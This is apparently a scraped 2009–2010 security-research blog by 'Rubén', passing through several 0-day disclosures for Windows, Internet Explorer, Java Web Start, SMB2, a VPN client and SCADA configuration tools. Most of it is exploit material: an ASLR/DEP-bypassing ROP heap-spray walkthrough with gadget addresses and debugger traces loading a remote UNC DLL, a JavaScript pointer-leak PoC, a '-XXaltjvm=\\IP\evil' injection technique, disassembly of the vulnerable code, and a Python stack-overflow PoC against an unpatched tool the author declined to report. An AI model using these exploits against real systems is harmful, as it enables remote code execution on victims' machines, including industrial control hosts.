15220cbc 15220c60 15220cbc 15220c64 15220cbc 15220c68 15220cbc [...] 15220c98 15220cbc 15220c9c 15220cbc 15220ca0 15220cbc 15220ca4 15220cbc 15220ca8 15220cbc 15220cac 15220cbc 15220cb0 15220cbc 15220cb4 15220cbc 15220cb8 15220cbc 15220cbc 15220cbc 15220cc0 15220cbc 15220cc4 15220cbc 15220cc8 295481e8 15220ccc 295481e8 // LoadLibraryA 15220cd0 295481e8 15220cd4 295481e8 15220cd8 295481e8 15220cdc 295481e8 15220ce0 295481e8 15220ce4 295481e8 15220ce8 295481e8 15220cec 295481e8 15220cf0 295481e8 15220cf4 295481e8 15220cf8 295481e8 15220cfc 295481e8 15220d00 295481e8 15220d04 295481e8 15220d08 70785c5c // DLL UNC PATH "\\xpl8.nu\1" 15220d0c 6e2e386c 15220d10 00315c75 Data is sprayed in such a manner we know that, despite of ASLR, at 0xXXXXX020, 0xXXXXX420,0xXXXXX820,0xXXXXXc20 our block can be located. As you can see a couple of gadgets are used, since this is a ROP exploit, however esp is not controlled at all. I'm taking advantage of common code generated by c++ compilers to control parameters and execution. The gadgets come from Windows Live messenger dlls that are loaded by default on IE and have no ASLR flag. 0x29527AE7 WindowsLiveLogin.dll gadget1 mov edx, [esi+0Ch] mov eax, [esi+8] push edi push offset dword_29501B68 push edx call eax 0x27582D63 msidcrl40.dll gadget2 add ecx, 0A0h mov eax, [ecx] mov eax, [eax+10h] pop ebp jmp eax stepping into the payload ole32!StRead+0x15: 75c9af58 ff510c call dword ptr [ecx+0Ch] ds:0023:15220c24=29527ae7 0:004> t eax=15220c20 ebx=05ca72a8 ecx=15220c18 edx=02c13968 esi=15220c20 edi=02c139d0 eip=29527ae7 esp=02c1394c ebp=02c13960 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 WindowsLiveLogin!DllCanUnloadNow+0x937: 29527ae7 8b560c mov edx,dword ptr [esi+0Ch] ds:0023:15220c2c=15220d08 0:004> t eax=15220c20 ebx=05ca72a8 ecx=15220c18 edx=15220d08 esi=15220c20 edi=02c139d0 eip=29527aea esp=02c1394c ebp=02c13960 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 WindowsLiveLogin!DllCanUnloadNow+0x93a: 29527aea 8b4608 mov eax,dword ptr [esi+8] ds:0023:15220c28=27582d63 0:004> t eax=27582d63 ebx=05ca72a8 ecx=15220c18 edx=15220d08 esi=15220c20 edi=02c139d0 eip=29527aed esp=02c1394c ebp=02c13960 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 WindowsLiveLogin!DllCanUnloadNow+0x93d: 29527aed 57 push edi 0:004> t eax=27582d63 ebx=05ca72a8 ecx=15220c18 edx=15220d08 esi=15220c20 edi=02c139d0 eip=29527aee esp=02c13948 ebp=02c13960 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 WindowsLiveLogin!DllCanUnloadNow+0x93e: 29527aee 68681b5029 push offset WindowsLiveLogin+0x1b68 (29501b68) 0:004> t eax=27582d63 ebx=05ca72a8 ecx=15220c18 edx=15220d08 esi=15220c20 edi=02c139d0 eip=29527af3 esp=02c13944 ebp=02c13960 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 WindowsLiveLogin!DllCanUnloadNow+0x943: 29527af3 52 push edx 0:004> t eax=27582d63 ebx=05ca72a8 ecx=15220c18 edx=15220d08 esi=15220c20 edi=02c139d0 eip=29527af4 esp=02c13940 ebp=02c13960 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 WindowsLiveLogin!DllCanUnloadNow+0x944: 29527af4 ffd0 call eax {msidcrl40!EnumerateDeviceID+0xa113 (27582d63)} 0:004> t eax=27582d63 ebx=05ca72a8 ecx=15220c18 edx=15220d08 esi=15220c20 edi=02c139d0 eip=27582d63 esp=02c1393c ebp=02c13960 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 msidcrl40!EnumerateDeviceID+0xa113: 27582d63 81c1a0000000 add ecx,0A0h 0:004> t eax=27582d63 ebx=05ca72a8 ecx=15220cb8 edx=15220d08 esi=15220c20 edi=02c139d0 eip=27582d69 esp=02c1393c ebp=02c13960 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 msidcrl40!EnumerateDeviceID+0xa119: 27582d69 8b01 mov eax,dword ptr [ecx] ds:0023:15220cb8=15220cbc 0:004> t eax=15220cbc ebx=05ca72a8 ecx=15220cb8 edx=15220d08 esi=15220c20 edi=02c139d0 eip=27582d6b esp=02c1393c ebp=02c13960 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 msidcrl40!EnumerateDeviceID+0xa11b: 27582d6b 8b4010 mov eax,dword ptr [eax+10h] ds:0023:15220ccc=295481e8 0:004> t eax=295481e8 ebx=05ca72a8 ecx=15220cb8 edx=15220d08 esi=15220c20 edi=02c139d0 eip=27582d6e esp=02c1393c ebp=02c13960 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 msidcrl40!EnumerateDeviceID+0xa11e: 27582d6e 5d pop ebp 0:004> t eax=295481e8 ebx=05ca72a8 ecx=15220cb8 edx=15220d08 esi=15220c20 edi=02c139d0 eip=27582d6f esp=02c13940 ebp=29527af6 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 msidcrl40!EnumerateDeviceID+0xa11f: 27582d6f ffe0 jmp eax {WindowsLiveLogin!DllUnregisterServer+0x1f588 (295481e8)} 0:004> t eax=295481e8 ebx=05ca72a8 ecx=15220cb8 edx=15220d08 esi=15220c20 edi=02c139d0 eip=295481e8 esp=02c13940 ebp=29527af6 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 WindowsLiveLogin!DllUnregisterServer+0x1f588: 295481e8 ff15f8105029 call dword ptr [WindowsLiveLogin+0x10f8 (295010f8)] ds:0023:295010f8={IEShims!NS_RedirectFiles::APIHook_LoadLibraryA (63e8fbe1)} 0:004> db poi(esp) 15220d08 5c 5c 78 70 6c 38 2e 6e-75 5c 31 00 00 00 00 00 \\xpl8.nu\1..... p0wn!! Unfortunately, due to the DLL Hijacking fiasco workaround, a LoadLibrary+UNC payload seems not very dangerous...isn't it? ;) The exploit defeats ASLR+DEP and has been successfully tested on W7, Vista and XP. A metasploit module should be available soon since I sent the exploit details to Joshua Drake some days before releasing this advisory. Metasploit module is already available: https://www.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb PoC: addr = 354552864; // 0x15220C20 [pUnk] var obj= ' ' +' ' +' '; Happy hunting!

[0day] Microsoft mshtml.dll CTimeoutEventList::InsertIntoTimeoutList memory leak
(Tuesday, 29 June 2010) Written by Rubén
Hi there! Long time ago since the last post. This time, I'm releasing another 0day, not so critical but interesting indeed. Sometimes, exploit writers would kill for a fixed address to pivote from. Nowadays, the days of ASLR and DEP, any memory leak is welcome. Yesterday, Stefano Di Paola posted the following tweet http://twitter.com/WisecWisec/status/17254776077 . After elaborating that weird behaviour I discovered a flaw in mshtml.dll, exploitable via Internet Explorer. In VBScript/JScript there are at least two functions that make use of timers: setTimeout and setInterval. According to the documentation, the return value should be a Timer ID.In Chrome and FF this ID is pure sequential (1,2,3,4...) but in IE I was getting "weird" IDs. Later on I discovered that those IDs turned out to be a heap address plus a counter. If your browser is Internet Explorer you can inmediately test this flaw by pressing this button. var i = 1; // counter function LeakOrDie() { var t; t=setInterval("foo()",2000); t-=i; document.getElementById('atun').innerHTML = ' Pointer leaked: '+'0x'+t.toString(16); i++; } function foo() { return; } We are leaking a pointer from a segment of the IE8's default process heap. But, what is that pointer? Why does it increment everytime I press the button? Let's see the technical analysis: Inside CWindow's constructor (mshtml's standard) a variable "IDEvent", is initialized to 1 Module: mshtml.dll Vista SP2 .text:7403EC0A mov dword ptr [ecx+30h], 1 ; TimerID_Counter = 1 Everytime a Timeout event (either created by setInterval or setTimeout ) is created, it's inserted into a list via this function. Module: mshtml.dll Vista SP2 text:741170E5 ; public: long __thiscall CTimeoutEventList::InsertIntoTimeoutList(struct TIMEOUTEVENTINFO , unsigned int , int) .text:741170E5 ?InsertIntoTimeoutList@CTimeoutEventList@@QAEJPAUTIMEOUTEVENTINFO@@PAIH@Z proc near .text:741170E5 ; CODE XREF: CWindow::AddTimeoutCode(tagVARIANT ,ushort ,long,long,uint )+73p .text:741170E5 ; CWindow::FireTimeOut(uint)+14DFB8p Take a look at this code, this is the key: Module: mshtml.dll Vista SP2 text:741170E5 ; public: long __thiscall CTimeoutEventList::InsertIntoTimeoutList [...] .text:74117100 mov eax, [esi+30h] ; p-> IDEvent .text:74117103 mov ecx, [ebp+arg_0] ; TimerEvent t; .text:74117106 add eax, esi ; s = p + p-> IDEvent; // Oops! .text:74117108 mov [ecx+0Ch], eax ; t-> ID = s .text:7411710B inc dword ptr [esi+30h] p-> IDEvent++ What's going on here? Well,my theory is that in an effort to not return a plain sequential/predictable ID, Microsoft decided to add a "magic" value. Unfortunately, this "magic" value is a pointer member of the CWindow object which ultimately represents an open browser's window. Thus we can define it as persistent in memory even after reloading, till the Browser's instance is closed. Taking into accout that IDEvent is predictable and we know the pointer offset, we can trivially infer the pointer to the persistent CWindow object(leakedPointer - ID_Counter - 0x3c). This fact brings us useful addresses for ROP/Anti-ASLR exploits. :) 06930dd8 6b0253f8 mshtml!CWindow::`vftable' 06930ddc 00000004 06930de0 00000008 06930de4 070f5720 06930de8 00000000 06930dec 6b028ad8 mshtml!CWindow::`vftable' 06930df0 6b04de30 mshtml!CWindow::`vftable' 06930df4 6aff257c mshtml!CWindow::`vftable' 06930df8 6aff2220 mshtml!CWindow::`vftable' 06930dfc 6aff25a0 mshtml!CWindow::`vftable' 06930e00 068ee3b0 06930e04 00000000 06930e08 068f4aa8 06930e0c 06926be0 06930e10 00000000 06930e14 6b01f5a4 mshtml!CDataAry ::`vftable' 06930e18 00000000 06930e1c 00000000 06930e20 00000000 06930e24 6b01f5a4 mshtml!CDataAry ::`vftable' 06930e28 00000000 06930e2c 00000000 06930e30 00000000 06930e34 6b01f5a4 mshtml!CDataAry ::`vftable' 06930e38 00000000 06930e3c 00000000 06930e40 00000000 06930e44 00000001 06930e48 00000000 06930e4c 00000000 06930e50 00000000 06930e54 00000000 Products affected: XP/Vista/Windows7 32/64 bit. IE8. IE9 is not vulnerable. Download PoC code Elaborate it as you desire and share it! Happy hunting!

[0DAY] JAVA Web Start Arbitrary command-line injection - "-XXaltjvm" arbitrary dll loading
(Friday, 09 April 2010) Written by Rubén
Updated Just in case: Tavis' attack also allows remote code execution since the jar is executing without any restriction. Updated Although Linux contains vulnerable code, I was unable to exploit it in the same manner. It likely can be exploited by using the proper sequence of command-line arguments, but the sudden release didn't allow me to research into this issue.I was focused on Windows at the moment of the disclosure. Bye bye my little 0day :(, Tavis Ormandy did a great job uncovering a big logic flaw within Java JRE. I discovered that bug and other that affects every browser few weeks ago so I posted the common "0day++" tweet . The method by which Java Web Start support has been added to the JRE is not less than a deliberately embedded backdoor(I really don't think so) or a flagrant case of extreme negligence (+1). It's even more incredible that Sun didn't assess the real risk of this flaw after Tavis reported it to them. Acknowledged it, but didn't considered suitable for a OOB patch. Let's see: Java Plugin for Browsers (Chrome,Firefox...) - Windows: npjp2.dll (The same for IE8's jp2iexp.dll) .text:6DAA3D96 .text:6DAA3D96 ; =============== S U B R O U T I N E ======================================= .text:6DAA3D96 .text:6DAA3D96 ; Attributes: bp-based frame .text:6DAA3D96 .text:6DAA3D96 sub_6DAA3D96 proc near ; CODE XREF: sub_6DAA2ACB+170p .text:6DAA3D96 .text:6DAA3D96 Data = byte ptr -264h .text:6DAA3D96 var_263 = byte ptr -263h .text:6DAA3D96 ApplicationName = byte ptr -160h .text:6DAA3D96 StartupInfo = _STARTUPINFOA ptr -5Ch .text:6DAA3D96 ProcessInformation = _PROCESS_INFORMATION ptr -18h .text:6DAA3D96 cbData = dword ptr -8 .text:6DAA3D96 hKey = dword ptr -4 .text:6DAA3D96 arg_0 = dword ptr 8 .text:6DAA3D96 arg_4 = dword ptr 0Ch .text:6DAA3D96 .text:6DAA3D96 push ebp .text:6DAA3D97 mov ebp , esp .text:6DAA3D99 sub esp , 264h .text:6DAA3D9F push edi .text:6DAA3DA0 lea eax , [ebp+ hKey ] .text:6DAA3DA3 push eax ; phkResult .text:6DAA3DA4 push 20019h ; samDesired .text:6DAA3DA9 xor edi , edi .text:6DAA3DAB push edi ; ulOptions .text:6DAA3DAC push offset SubKey ; "JNLPFile\\Shell\\Open\\Command" .text:6DAA3DB1 push 80000000h ; hKey .text:6DAA3DB6 mov [ebp+ cbData ] , 104h .text:6DAA3DBD call ds: RegOpenKeyExA .text:6DAA3DC3 test eax , eax .text:6DAA3DC5 jz short loc_6DAA3DCE .text:6DAA3DC7 xor eax , eax .text:6DAA3DC9 jmp loc_6DAA3F16 The default handler is "javaws.exe",continuing... .text:6DAA3EB7 push [ebp+ arg_4 ] .text:6DAA3EBA push eax .text:6DAA3EBB push offset aSDocbaseSS ; "\"%s\" -docbase %s %s" .text:6DAA3EC0 push esi ; LPSTR .text:6DAA3EC1 call ebx ; wsprintfA .text:6DAA3EC3 add esp , 14h .text:6DAA3EC6 jmp short loc_6DAA3ED4 .text:6DAA3EC8 ; --------------------------------------------------------------------------- .text:6DAA3EC8 .text:6DAA3EC8 loc_6DAA3EC8: ; CODE XREF: sub_6DAA3D96+11Fj .text:6DAA3EC8 push eax .text:6DAA3EC9 push offset aSS_0 ; "\"%s\" %s" .text:6DAA3ECE push esi ; LPSTR .text:6DAA3ECF call ebx ; wsprintfA .text:6DAA3ED1 add esp , 10h .text:6DAA3ED4 .text:6DAA3ED4 loc_6DAA3ED4: ; CODE XREF: sub_6DAA3D96+130j .text:6DAA3ED4 push 11h .text:6DAA3ED6 pop ecx .text:6DAA3ED7 xor eax , eax .text:6DAA3ED9 lea edi , [ebp+ StartupInfo ] .text:6DAA3EDC rep stosd .text:6DAA3EDE lea eax , [ebp+ ProcessInformation ] .text:6DAA3EE1 push eax ; lpProcessInformation .text:6DAA3EE2 xor ebx , ebx .text:6DAA3EE4 lea eax , [ebp+ StartupInfo ] .text:6DAA3EE7 push eax ; lpStartupInfo .text:6DAA3EE8 push ebx ; lpCurrentDirectory .text:6DAA3EE9 push ebx ; lpEnvironment .text:6DAA3EEA push ebx ; dwCreationFlags .text:6DAA3EEB push ebx ; bInheritHandles .text:6DAA3EEC push ebx ; lpThreadAttributes .text:6DAA3EED push ebx ; lpProcessAttributes .text:6DAA3EEE push esi ; lpCommandLine .text:6DAA3EEF lea eax , [ebp+ ApplicationName ] .text:6DAA3EF5 push eax ; lpApplicationName .text:6DAA3EF6 mov [ebp+ StartupInfo.cb ] , 44h .text:6DAA3EFD call ds: CreateProcessA So basically the Java-Plugin Browser is running "javaws.exe" without validating command-line parameters. These parameters can be controlled by attackers via specially crafted embed html tags within a webpage. Let's see JavaDeploy.txt : if (browser == 'MSIE') { document.write(' ' + ' ' + ' ' + ' '); } else if (browser == 'Netscape Family') { document.write(' '); } That's it. This is how JAVA Plugin identifies Java Web Start content (jnlp files).So We can inject command-line parameters through "docbase" tag and even "launchjnlp". What type of arguments can we abuse to compromise a system? java.exe and javaw.exe support an undocumented-hidden command-line parameter "-XXaltjvm" and curiosly also "-J-XXaltjvm" (see -J switch in javaws.exe). This instructs Java to load an alternative JavaVM library (jvm.dll or libjvm.so) from the desired path. Game over. We can set -XXaltjvm=\\IP\evil , in this way javaw.exe will load our evil jvm.dll. Bye bye ASLR, DEP... Linux Same logic error, check this function "_Z10launchJNLPPKcS0" in libnpjp2.so .text:0000A956 call _fork .text:0000A95B test eax, eax .text:0000A95D jnz loc_A813 .text:0000A963 mov [esp+3048h+var_3048], esi .text:0000A966 lea eax, [ebp+var_3038] .text:0000A96C mov [esp+3048h+var_3044], eax .text:0000A970 call _execv MACOSX Not vulnerable. Workaround Disable javaws/javaws.exe in linux and Windows by any mean. Disable Deployment Toolkit to avoid unwanted installation as stated in Tavis' advisory .

Changes in PspIsDescriptorValid
(Wednesday, 07 April 2010) Written by Rubén
Hi there You should read these articles before continuing: Derek Soeder's LDT expand-down vulnerability My "VMware #GP Kernel DoS" advisory z0mbie's article on LDT entries Just sharing a curious thing I've found in a diffing session. Within the kernel PspIsDescriptorValid has changed in Vista and later.The code charged with checking for base+limit against kernel addresses is no longer present. XP kernel PAGE:00556115 loc_556115: ; CODE XREF: PspIsDescriptorValid(x)+76j PAGE:00556115 add eax, edi PAGE:00556117 cmp edi, eax PAGE:00556119 ja short loc_55612B PAGE:0055611B cmp eax, _MmHighestUserAddress PAGE:00556121 ja short loc_55612B This means that we can create LDT descriptors (via NtSetLdtEntries) with arbitrary base and limit. This is not a big deal since the kernel seems to be correctly changing user-mode selectors in every Ring3-Ring0 transition, SYSENTER, Page Faults... But, what about others? i.e security software that might be implementing insecure SYSENTER hooking without sanitizing segment selectors obtained from user-mode. Can you spot an exploitation vector? share it if so! Thanks and kudos for Derek Soeder. From time to time, we can enjoy his advisories...

Exposing HMS HICP Protocol + 0Day 'light' + SCADA_SHODAN
(Monday, 14 December 2009) Written by Rubén
I'll be conducting a Reverse Engineering Training (8 hours = 1 day) within the context of the RootedCON Security Conference on March 15, 2010. RootedCON 2010 will take place at the Auditorium inside the " Centro de Convenciones Mapfre ", in Madrid, Spain (Europe :P), on March 18 - 20, 2010. More info: http://www.rootedcon.es Reversemode 2.0 hehe, http://www.twitter.com/reversemode Hi all, After a long period of inactivity I'm back with fresh content. Today we are going to reverse a simple M2M propietary protocol developed by the swedish company HMS .In addition to this, a related 0day will be disclosed and finally, we'll learn to find out SCADA systems with the help of the new toy: SHODAN 1st PART "HMS HICP Protocol" AFAIK there is no public documentation about this protocol, if not so please let me know and I'll repeatedly hit myself with a sharpened stick.All the information presented here has been obviously obtained by reverse engineering. Despite of the fact that this protocol is not complex,I think it has a potential interest regarding SCADA security.You'll see why. HICP, is intented to configure HMS's products that include ethernet/ capabilities, since they need a method for configuring Internal IP,DCHP,NetworkMask,DNS,gateway.... In 2004 HMS released a free tool named "Anybus IPconfig" which can be used to scan a network where the devices are connected, then proceeding to configure them. The components of this application are a simple MFC based GUI and a dll (hicp.dll). So let's take a look at the exports: Code (asm) .text:100027AF ; int __cdecl HICP_SendModuleScan() .text:100027AF public ?HICP_SendModuleScan@@YAHXZ .text:100027AF ?HICP_SendModuleScan@@YAHXZ proc near .text:100027AF push ebp .text:100027B0 mov ebp , esp .text:100027B2 call sub_10002175 .text:100027B7 pop ebp .text:100027B8 retn .text:100027B8 ?HICP_SendModuleScan@@YAHXZ endp In C Code (c) sprintf ( &Dest, "Module Scan" ) ; to. sa_family = AF_INET; * ( _WORD * ) &to. sa_data [ 0 ] = htons ( HICP_PORT ) ; // 3250 UDP * ( _DWORD * ) &to. sa_data [ 2 ] = htonl ( IP_BROADCAST ) ; v1 = strlen ( &Dest ) ; if ( sendto ( s, &Dest, v1 + 1 , 0 , &to, 16 ) != -1 ) So we can see that in order to scan the network, this tool sends a broadcast UDP packet containing the string "Module Scan" to the HICP port (3250). Inside HMS-AnyBus based devices we can find a hicp daemon listening on port 3250. Once the device receives that packet it broadcasts a reply, which contains its current configuration, to the network on port 3250. The configure Tool listens on this port as well. Let's see what parameters can be configured via this protocol. Any value after the '=' can be modified. +“Protocol version = 1.10; ” # Obvious +”fb type = EVIL-DEVICE; ” # Device Type +”module version = 0.66.6; ” # ... +”mac = 00-30-11-00-CA-FE; ” # MAC +”ip = 192.168.1.252; ” # ... +”sn = 255.255.255.0; ” # Network Mask +”gw = 192.168.1.1; ” # Gateway +”dhcp = off; ” # whether the device is using a DHCP server for obtaining the IP address. (on/off) +”pswd = off; ” # whether the device is using a PASSWORD(on/off) +”hn = morroBufalo; ” # hostname (optional) +”dns1 = 192.168.1.33; ” # Primary DNS +”dns2 = 192.168.1.34; ” # Secondary DNS (optional) +”password = admin; ” # old password (if any, admin by default) +”new password = fatbird; ” # new password These parameters are sent via UDP in plain text, concatenating each one and separated by a ";". If you want to configure a device, you need to prepend a "Configure:" string in this way: "Configure: xx-xx-xx-xx-xx-xx;"+ parameters_string. Where xx-xx-xx-xx-xx-xx is the MAC of the device you want to configure. You can take a look at HICP_SendConfigure code to verity it. This request is broadcasted so is received by any device/machine in the network listening on 3250/UDP. The device checks the MAC against it own and if matches then proceeds to update its internal registers.The first three bytes of the MAC are always 00-30-11 which correspond to the HMS' oui as expected. In addition to this request, there are a couple of additional replyes implemented: + "Invalid Password:" to indicate a failed configuration attempt + "Reconfigured:" to indicate success. That's all. Make your own conclusions about the security level of this protocol.I'm just presenting facts. 2nd Part "Intellicom NetBiterConfing.exe Remote Stack Overwrite". Oday Light. Another swedish company this time, Intellicom develops a serie of SCADA products/devices named NetBiter WebSCADA which are based on HMS AnyBus RemoteCOM device. We can download the firmware, as well as two tools to configure and update these devices respectively.Free goods are always nice. First off, taking a look at the GUI of the tool for configuring devices, NetBiterConfig.exe, we can see that looks pretty similar to the HMS one.Except for a couple of added buttons, one to "wink" a device and the other is to start an "emergency" DHCP server, the tools contains the same components: hicp.dll and a MFC GUI. However, this one contains a surprise. Ok, NetBiterConfig.exe is listening on 3250/UDP receiving packets for any interface, so we can send a specially crafted UDP packet from outside the network to trick the tool into thinking we are a NetBiter device. If we fill "hn" parameter (HostName) with more than 0x20 bytes, we can start to overwrite data in the stack. By constructing a hostname of 0x60 bytes we can overwrite a pointer to an vtable of applications' subclassing methods, this can be used to achieve code execution by emulating a vtable under our control. 0x60 is not an arbitrary value, it allows us to get %esi pointing to the last 0x20 (approximately) bytes of our shellcode. The flaw is triggered when the admin double-clicks in the list box item. The flaw is a classic strcpy without proper bounds checking in NetBiterConfig.exe Code (asm) .text:00403E52 lea edx , [ ebp- 0ABh ] .text:00403E58 push edx ; evil hostname .text:00403E59 lea eax , [ ebp-3CCh ] .text:00403E5F push eax .text:00403E60 call strcpy The flaw does not exist in AnybusIpconfig.exe since it uses "strncpy": Code (asm) .text: 00403691 push 80h .text: 00403696 lea eax , [ esp + 0E1h ] .text:0040369D push eax .text:0040369E lea ecx , [ esp +494h ] .text:004036A5 push 80h .text:004036AA push ecx .text:004036AB mov byte ptr [ esp +530h ] , 1 .text:004036B3 call sub_425666 …. …. .text:004256D9 mov cl , [ edx ] .text:004256DB mov [ eax ] , cl .text:004256DD inc eax .text:004256DE inc edx .text:004256DF cmp cl , bl .text:004256E1 jz short loc_4256EB .text:004256E3 dec edi .text:004256E4 jz short loc_4256EB .text:004256E6 dec [ ebp +arg_C ] .text:004256E9 jnz short loc_4256D9 I have not contacted the vendor because I don't feel like it. I am tired of having to elaborate a high technical issue to a customer support agent who will be thinking for sure "WTF?!?". I've got a new ethic rule: "No explicit security contact publicily available + no money involved (I'm used to eat almost three times a day) == 0day". PoC Code (python) #!/usr/bin/python # Intellicom NetBiterConfig.exe 1.3.0 Remote Stack Overwrite. # Ruben Santamarta - www.reversemode.com # For research purposes ONLY. # If you use this code to cause damage I’ll cut you open like a f**ing pig. import sys import socket s = socket . socket ( socket . AF_INET , socket . SOCK_DGRAM ) s. connect ( ( "10.10.10.10" , 3250 ) ) s. send ( "protocol version = 1.10; " + "fb type = EVIL-DEVICE; " + "module version = 0.66.6; " + "mac = 00-30-11-00-BA-CA; " + "ip = 192.168.1.52; " + "sn = 255.255.255.0; " + "gw = 192.168.1.1; " + "dhcp = off; " + "pswd = off; " + "hn = " + "A" 0×60+ "; " + "dns1 = 192.168.1.33;" ) Another interesting thing is that you can download the firmware for free. The firmware is a .bin file that is comprised of a 0x5F bytes header, which includes a magic 'NBU'+MajorMinorVersion+ImageSize+Checksum+VersionString, followed by a simple gz file so if we cut off the header we can decompress the remaining gz file. Cool. The firmware is a custom linux for MotorolaColdFire processor. It contains interesting stuff like default password... 3rd PART SHODAN is in da house. This means...SCADA systems. Watch out!, don't mess with this type of systems if you don't know what you are really doing. I am not responsible in any manner of any damage you can cause.

Regarding SMB2.0 Negotiate BSOD published by Laurent Gaffié
(Tuesday, 08 September 2009) Written by Rubén
Today I wake up with an advisory published by Laurent Gaffié where a possible BSOD is announced. The advisory does not provide any technical detail and it is only based on empirical results so it needs to be verified. This is the result of my brief research. Change DoS to Remote Code Execution and Local Privilege Escalation. Why? Module: srv2.sys Code (asm) ; int __stdcall Smb2ValidateProviderCallback(PVOID DestinationBuffer) _Smb2ValidateProviderCallback@ 4 proc near … … .text:000156B3 loc_156B3: ; CODE XREF: Smb2ValidateProviderCallback(x)+4D5j .text:000156B3 ; Smb2ValidateProviderCallback(x)+4DEj .text:000156B3 movzx eax , word ptr [ esi + 0Ch ] ; packet->SBM_Header->Process_ID_High .text:000156B7 mov eax , _ValidateRoutines [ eax * 4 ] ; BUG - out-of-bounds dereference. .text:000156BE test eax , eax .text:000156C0 jnz short loc_156C9 .text:000156C2 mov eax , 0C0000002h .text:000156C7 jmp short loc_156CC .text:000156C9 ; ————————————————————————— .text:000156C9 .text:000156C9 loc_156C9: ; CODE XREF: Smb2ValidateProviderCallback(x)+4F3j .text:000156C9 push ebx .text:000156CA call eax ; Smb2ValidateNegotiate(x) ; Smb2ValidateNegotiate(x) - KABOOOM!! As you can see,[ ESI+0xC ] points to our packet, exactly to the ProcessIDHigh header field whose size is 16 bits. We can fully control this value. Later on this value is used as index to a Function Pointer within the function table _ValidateRoutines . Classic Bug, an out-of-bounds dereference since the code is not checking the size of the table before dereferencing the function pointer. This is the reason why this vulnerability is a Remote Code Execution and not only a DoS. And this is the reason why the exploit provided may or may not crash a machine. If the page pointed by the index is invalid the system will BSOD otherwise it might crash on another point or simply not to crash. How to exploit it? We see that ESI points to our packet, in addition this function table is located at .data which is located before .PAGE addresses so we can dereference a pointer in that area as well. We "only" need to find a suitable pointer to control the execution. Vulnerable systems: Vista, 7 RC and < 2008 Server R2 according to Microsoft. Keep tuned, I'll post any further development regarding this issue. More info on the blog (castilian) where I collaborate: http://blog.48bits.com

Safenet is not so safe...
(Tuesday, 02 June 2009) Written by Rubén
Hi! Time to VPN Clients...Reversemode proudly presents "Safenet SoftRemote IKE ireIke.exe service Remote Stack Overflow (Pre-Auth) " ZDI Advisory Safenet SoftRemote Overview http://www.safenet-inc.com/softremote/ SoftRemote is an award-winning VPN client platform for desktop and mobile devices that delivers robust security, ease of use, and powerful policy management features. With an installed base of millions of users, SoftRemote has become the de-facto standard for VPN client software worldwide. Leading VPN vendors use the SoftRemote's OEM version within their custom solutions. Some of these products are: ● Juniper NetScreen Remote ● NetGear Prosafe VPN client ● WatchGuard Mobile User VPN Client Thus, the vulnerability affects every “SoftRemote powered” product. Preface In this document we use Juniper NetScreen Remote as “scapegoat” to demonstrate the vulnerability since it is bundled with the vulnerable version of Safenet's SoftRemote OEM version. This fact does not mean that Juniper NetScreen Remote is the only product affected. As it was explained before, every product powered by Safenet's SoftRemote is vulnerable. Technical Details ireIke.exe service is prone to a remote stack overflow. Malicious attackers can anonymously exploit this flaw by sending a specially crafted UDP packet to the port 62514. Successful exploitation grants SYSTEM privileges to the attacker. ireIke.exe service binds several ports for internal usage, this process can be traced by debugging the following function: Module: ireIke.exe .text:0043C8E0 sub_43C8E0 proc near ; CODE XREF: sub_41A8B0+295#p .text:0043C8E0 ; sub_437F00+442#p ... .text:0043C8E0 .text:0043C8E0 WSAData = WSAData ptr -190h .text:0043C8E0 arg_0 = dword ptr 4 [...] .text:0043CAF4 loc_43CAF4: ; CODE XREF: sub_43C8E0+1ED#j .text:0043CAF4 ; sub_43C8E0+208#j .text:0043CAF4 mov eax, dword_46F2BC .text:0043CAF9 push eax ; int .text:0043CAFA push 0F432h ; 62514 – IPC socket .text:0043CAFF push 11h ; int .text:0043CB01 push 2 ; af .text:0043CB03 call sub_43B850 ; binds .text:0043CB08 add esp, 10h .text:0043CB0B cmp eax, edi .text:0043CB0D mov dword_46F280, eax .text:0043CB12 jnz short loc_43CB34 .text:0043CB14 test byte_45ED58, bl .text:0043CB1A jz short loc_43CB34 .text:0043CB1C push offset SourceName ; "IreIKE" .text:0043CB21 push offset aSUnableToBin_1 ; "%s: Unable to bind IPC socket!" .text:0043CB26 mov dword_479FF8, ebx .text:0043CB2C call sub_437020 .text:0043CB31 add esp, 8 ireIKE.exe after receiving the packet, uses the fifith byte as a “command”. .text:00449E19 movsx eax, byte ptr [ebx+4] ; fifth byte .text:00449E1D add eax, 0FFFFFFD8h ; command - 0x28 .text:00449E20 mov [esp+3F4h+var_3DC], ebp .text:00449E24 cmp eax, 19h ; switch 26 cases 'commands' .text:00449E27 ja loc_44AB78 ; default .text:00449E27 ; jumptable 00449E35 cases 7,9,10,14,16-18,20-24 .text:00449E2D xor edx, edx .text:00449E2F mov dl, ds:byte_44ABE4[eax] .text:00449E35 jmp ds:off_44ABA8[edx4] ; switch jump The first DWORD needs to be 1 for an internal IPC packet. We can trigger the flaw by invoking the command 0x19 = > (payload+4) = 0x41 . Other commands are also vulnerable since they rely on the common error logging routine when the operation fails. Any data associated with the command starts at (payload+9) text:0044A9B3 loc_44A9B3: ; CODE XREF: sub_449DA0+95#j .text:0044A9B3 ; DATA XREF: .text:off_44ABA8#o 